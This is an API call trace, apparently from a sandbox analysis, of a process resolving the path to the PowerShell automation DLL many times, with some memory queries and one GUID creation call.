	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.640] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.643] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.643] VirtualQuery (in: lpAddress=0x26b2c0, lpBuffer=0x26c180, dwLength=0x30 | out: lpBuffer=0x26c180*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.643] VirtualQuery (in: lpAddress=0x26b350, lpBuffer=0x26c210, dwLength=0x30 | out: lpBuffer=0x26c210*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.644] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.645] VirtualQuery (in: lpAddress=0x26b700, lpBuffer=0x26c5c0, dwLength=0x30 | out: lpBuffer=0x26c5c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.646] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.646] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.646] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.646] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.646] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x8f2f20a6, Data2=0x3d2, Data3=0x4aaf, Data4=([0]=0x97, [1]=0x7, [2]=0x58, [3]=0x85, [4]=0xa3, [5]=0x38, [6]=0xd3, [7]=0x5e))) returned 0x0
	[0430.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
